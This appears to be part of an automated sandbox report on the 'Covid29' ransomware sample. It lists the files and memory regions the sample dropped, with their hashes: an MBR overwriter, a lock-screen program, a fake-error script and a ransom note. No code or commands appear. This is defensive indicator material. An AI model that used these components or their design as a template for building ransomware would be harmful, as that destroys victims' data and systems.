C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
0b42f655af4a02ac00bec92d0e0b86de

SHA1
269109ebbc3eb58ddf69fc30baf3e3afe20a1b2e

SHA256
97c8f8a8933e3ff8320cd14cd385a0d29a2b93ba524f2796db1c5f62e9d2decc

SHA512
b235826b50e82bb7a18d4a160961cdd89f912b5f74e2b47a26835cdf7911c8654aaa48245a564324896233e7a53fa16e72da369c37be9e6f776f4b68487bb70d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
59650d2ebfc2edf8d17622e2a784e2c5

SHA1
ceebd364106896e16f1b0679952948de555e81e9

SHA256
bc669b5376dc18f637a1a410826aeccf5ee8037c6981f6c8389b996dcd63e50f

SHA512
1046a9afff9f0007f19904b590222bd3e2a4e2fd426fbbf9ed6ece3fbb467733454a0c36f3228017982fb13b43b12446dc012d183c25c6d25fd5070f113d5c9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
74f813492db70a06c5ddc4d2ff46379d

SHA1
827819598155e9fb74d3a191cba850abcec63858

SHA256
94a44d2401d33d621118eefa964def32fd65cc0406b2bb1f1a0da0bc69526f1f

SHA512
07969e4c1cf74b8f96e90cd2cc5e3f13062d563c46107fe11097244dbd8a18094014640ca7202e428c66d35b79731a8d2ece7097fc80f05d5ac13efe1439645d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
a767302f1c4707c5d3bb922feeeed115

SHA1
affaee3a75eef29047249877db9dc197055c957d

SHA256
d6b2ce55295f983e2cbd34355ca7baecb52d532c3daea988880a618181ed5f05

SHA512
3e707ba6299d35120121f72d88ea2e9509d6af556b1196f68d17d1939f986f8319b18b6f03c295b6f3d5356e3bcfa99ce534fea5e3e3bb818938a49a1eb9094f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
c6ca2aa7b7fc3fdd13c444c64f8fa7e4

SHA1
a88619c6fb5ec67369a80e3ed6d70dae8bd07469

SHA256
232fd437b5d64ab8dcdbf0f56bbfbae377edb5d3f4fe73cb83604842967ff221

SHA512
64280b27d55bf6fdca3d10a34467a8a139cf9e560549ad178e6e1d3f0067039301642f85530f2d52506557c24482205c8d62f66563e9a5e1f2d9c14553ea4e22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
b3e2a84687e0861d074d2962fa703c32

SHA1
fa3764ace753f897fe1045cbc503afeac1c170ee

SHA256
5e7e3fafc712090d8290221b24ca4996ba801d3d2562af285fafab8f16900782

SHA512
9e1af6ffec6f95185b1f101340ad0472ac6e85927d7c20e2857618c76ac89c86e24d5c7bb67bd3924729ea433bd116915b33b1ec18320e0ccae3dccd894552a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
d64e1e061507a746acfacb34832fac73

SHA1
ec46146dd916d885701e3fe51615d8fb16ffc7bc

SHA256
5ca0c29cc7f8f05bbfd25f797609278d8505780b600c8b223395396661c5da66

SHA512
f7c05c54009b09600854e5f7797718b6d100e97b9e645d10ce0574f6d9b39199dc5b4987d5e04768d89e6b3cda0c54c573c0c4c0912fa8df3e44ae4b7400a415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
e9deb246ac412215abd5afa1c8423505

SHA1
8c4700e21215cd821238fbd9e4eee10b44a24f6a

SHA256
ade82a291f1f551086e09341e01216382bd6521f1130c425a196c2b180c5e78c

SHA512
7d3cbd3817fdadf9fa1c85be55b8a5ad44c01f6ed07bd58ec7d5f46843cbda06e72628a2209377b158df41552c89d946898a81b879f86c8ce0b8041b3d86f9e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
7e35f041bac9e761d259ca07cef5eed0

SHA1
44d185f5f575d1b3129c674955bd41379ea6b932

SHA256
2a5afcffdf7aade882c7f2468710fd128409ceaa2b65e758248a2524eafecfff

SHA512
94ff11ae41567b885c8bcb5a0dab3d189728acc5c08ed4962ba59e527eb8374ac210eed4547fd6856c58f79fbdf1a39edefb8f8940fb86962aabe011660f2860

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57da52.TMP

Filesize
1KB

MD5
aeb56c54eac37fb34b916f81a5cfa551

SHA1
7ba7ced2477aeecdb20dc04c8a111974079dc85d

SHA256
7fd09725da630cba0361c9cad9f3b397b5d65f0413810d80de9a3e611e4fc5d2

SHA512
21f745b4c0dcf8dba3badab605117d56d83d8b249c17641e5bd817bcd1363b5eeb765f0fdc82d9ea8a7f2ddafde886a74da74d8f444cabd1fad8908a1af1981a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2acaaad79d009b64d43b12e00b6278cc

SHA1
10e297bc67b2ede2e8dc1eee5d3a2def2bb6f90c

SHA256
ba2bf643b349fd93978ff4ba1202172a7b1aed7d3953427cc884e797884a995b

SHA512
66e100be6c6ea43e0920ffd88b28b798d9700616f20e051fb6d34ac4f29700a786656cd6d61ea983595e48d3c562f43dd756347c9c5cef21ea3cd60820fbe4b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
81cc246c5ca0338a7564b4c68cefffb0

SHA1
9c2a102d9793159e0de68bc0bd8d632619b3ddd9

SHA256
b1ad0058b317966723eb050e139245b0463ec9fb008f010ed5cc5f583947adf0

SHA512
8c029f31d0e0a8ff5211a3eae0cbab3d519f2d979e37512aacba6b88dadd94ad5f1d61eb873070ef857dfc14d843f48386106bb633439227a4a53570200e55f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
07c1b5a013027918b2148ba0bd7c65bf

SHA1
0928f84a4e879dc97a5c390de761d23a01d47203

SHA256
634aaf21fbfb074cdedf5bfbd1723eb451905249d5440455934eb60905272a1f

SHA512
d572ceadff6bb2042b12e035b2578167f47ca98239874e5e50dbd781c7cb996eb7751270fe066918f6cb9aaec6cf0e59b2f3ad79acb65cb263d6db2327b1e7d9

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\c6725467-cb4c-4c8c-ba30-2fb271af92a4.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\DD29.tmp\Cov29Cry.exe

Filesize
103KB

MD5
8bcd083e16af6c15e14520d5a0bd7e6a

SHA1
c4d2f35d1fdb295db887f31bbc9237ac9263d782

SHA256
b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

SHA512
35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\DD29.tmp\Cov29LockScreen.exe

Filesize
48KB

MD5
f724c6da46dc54e6737db821f9b62d77

SHA1
e35d5587326c61f4d7abd75f2f0fc1251b961977

SHA256
6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

SHA512
6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

Download Submit
C:\Users\Admin\AppData\Local\Temp\DD29.tmp\mbr.exe

Filesize
1.3MB

MD5
35af6068d91ba1cc6ce21b461f242f94

SHA1
cb054789ff03aa1617a6f5741ad53e4598184ffa

SHA256
9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

SHA512
136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

Download Submit
C:\Users\Admin\AppData\Local\Temp\E518.tmp\TrojanRansomCovid29.bat

Filesize
1KB

MD5
57f0432c8e31d4ff4da7962db27ef4e8

SHA1
d5023b3123c0b7fae683588ac0480cd2731a0c5e

SHA256
b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

SHA512
bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\E518.tmp\fakeerror.vbs

Filesize
144B

MD5
c0437fe3a53e181c5e904f2d13431718

SHA1
44f9547e7259a7fb4fe718e42e499371aa188ab6

SHA256
f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

SHA512
a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbp2s24yy.jpg

Filesize
30KB

MD5
108fc794e7171419cf881b4058f88d20

SHA1
dd05defd9fe5fb103db09eb2a3bb72c5ed7d8777

SHA256
741d2576009640a47733a6c724d56ed1a9cee1014cde047b9384181a1758cd34

SHA512
3a1a22217ff636e48612ff3b55ac6611eda6ae0b5a1f4d693440cbd6aef84d6657d3cd076ca828ba828ee556ab64e5bdecb37c1d682590877f3b23345baeb0ea

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
12KB

MD5
0926502f35df81cb53d54db297dda20d

SHA1
c58fd9defcbf4382f906434be5af03bc87e08696

SHA256
3caa3b8cc131e21ce6d9d7318f6bb38ba4affc37829693b99642633174583a48

SHA512
48b0cbb1071e2cabf7f176c4fb5233eff86b261c9d423f8ab919d43c3867d70595e012f4b7c680e7410a3a9230e36e61670b5680765ef167d1f295619236acb3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
5ab57fbe266860305bd00794112e96c6

SHA1
5978706cf1adc75797eb15a1006373a19c2562c9

SHA256
e6ac62c3dbdf9d3b3ffaf8d7a87cda886f11d29556338b3ad4d3bda5d53c7c1d

SHA512
f7c11cd0a9cfcd2192deb11be4219378a8b0a273c9a5700cbcb6b3ec9805f7a06d9e9db26a185276b941ad3dc3e01f89350c34b055f541ae3c1851f1171c4159

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
4cb70025c7860977cdfe7e8fc8441450

SHA1
5d7bd908308700125385f34ba8a13332c15ea927

SHA256
4042aa37e6e8edd3212ceb87397608fd12c660c89b6c98a7e832ea7d9e74aed1

SHA512
ae19d991d8fdbda983b92739d1c92b44568cefde4f58974e714199cdbfbba41c3aa140686405aec776436597a303d3fd22b237fc63d6b18cb1f1b0d840ee1950

Download Submit
C:\Users\Admin\Desktop\covid29-is-here.txt

Filesize
861B

MD5
c53dee51c26d1d759667c25918d3ed10

SHA1
da194c2de15b232811ba9d43a46194d9729507f0

SHA256
dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

SHA512
da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

Download Submit
C:\Users\Admin\Downloads\Covid29 Ransomware (2).zip:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\Covid29 Ransomware (5)\TrojanRansomCovid29.exe

Filesize
542KB

MD5
9f0563f2faaf6b9a0f7b3cf058ac80b6

SHA1
244e0ff0a5366c1607f104e7e7af4949510226ec

SHA256
a8054338891db7231f9885ca0d3bc90a651c63878ff603ede5c3efafa7e25254

SHA512
40cdf4c754977e60c233417e42a62be02f9b5bfe239c0378664c28757ce6ce1fc3b91b83d6ef6bb184c4d831761f57a07255526d12a3a955c3b473bddb97f4c9

Download Submit
C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\Cov29LockScreen.exe:Zone.Identifier

Filesize
91B

MD5
9c7638abb20353dc0ddf550f762291ae

SHA1
dc0a10bde301b21a3fb744fe2191db145d6940d5

SHA256
90ce425f5007217e21a3041d33881f51c4ed64970b27dc6da456921ad53c2123

SHA512
c84df3d8f59586e68d9875334ef37b3593009cb4058fac2513aa1bc1e77477df96736588f7ec749e023fde96856395f275492778c31f54caf973a270f04773ee

Download Submit
C:\Users\Admin\Downloads\Covid29 Ransomware (5)\source\mbr.cpp

Filesize
365B

MD5
d20eddecb5625b60d61d80c067537188

SHA1
8418cb3dd155a9399e7be92da3b4fcd50b559f99

SHA256
45eaa30a90c739fd9fb32d59b29d3e7cd8871431670a3e64d6c34fd53a08f979

SHA512
a0f1578adbabaa0cd5567678ac382637ea078070ef7f567251374ff7f1d1e3e2c6d108471a0cd6aeeb47058d06e0c2bafd0e8f487be04208e44311e478c1f980

Download Submit
memory/1320-3844-0x00000000006C0000-0x00000000006E0000-memory.dmp

Filesize
128KB

Download
memory/2160-3843-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2828-3955-0x0000000000400000-0x00000000005D5000-memory.dmp

Filesize
1.8MB

Download
memory/2828-3845-0x0000000000400000-0x00000000005D5000-memory.dmp

Filesize
1.8MB

Download
memory/3856-4139-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/5168-3869-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/5540-3950-0x0000000000400000-0x00000000005D5000-memory.dmp

Filesize
1.8MB

Download
memory/5540-3947-0x0000000000400000-0x00000000005D5000-memory.dmp

Filesize
1.8MB

Download
memory/5540-3819-0x0000000000400000-0x00000000005D5000-memory.dmp

Filesize
1.8MB

Download
memory/5916-4115-0x0000000000400000-0x00000000005D5000-memory.dmp

Filesize
1.8MB

Download